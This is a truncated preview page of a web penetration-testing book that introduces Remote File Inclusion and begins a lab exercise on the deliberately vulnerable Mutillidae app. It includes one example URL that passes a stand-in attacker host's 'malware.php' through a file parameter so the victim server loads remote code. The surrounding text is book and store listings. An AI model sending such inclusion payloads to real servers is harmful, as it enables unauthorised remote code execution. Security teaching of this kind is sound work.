book

Practical Web Penetration Testing

by Gus Khawaja

June 2018

Intermediate to advanced

294 pages

7h 5m

English

Packt Publishing

Read now

Unlock full access

Content preview from Practical Web Penetration Testing

Remote File Inclusion

Remote File Inclusion (RFI) is exploited by including a file path in the URL that points to the remote file outside the boundaries of the web server that hosts the web application.

Consider the following example:

http://domain_name/index.php?file=http://hacker_domain/malware.php

In the preceding URL, the victim server will load the malware.php page that resides on the hacker's server. Let's see a practical example using Mutillidae:

Browse to the Mutillidae homepage and select OWASP 2017. We will choose the same menu that we used previously for the Local File Inclusion, that is, Broken Access Control | Insecure Direct Object References | Arbitrary File Inclusion.
So, it's the same page that we tested for the Local File ...

Become an O’Reilly member and get unlimited access to this title plus top books and audiobooks from O’Reilly and nearly 200 top publishers, thousands of courses curated by job role, 150+ live events each month,
and much more.

Start your free trial

Hands-On Web Penetration Testing with Metasploit

Harpreet Singh, Himanshu Sharma

Advanced Infrastructure Penetration Testing

Chiheb Chebbi

Mastering Modern Web Penetration Testing

Prakhar Prasad

Penetration Testing

Georgia Weidman

Publisher Resources

ISBN: 9781788624039Supplemental Content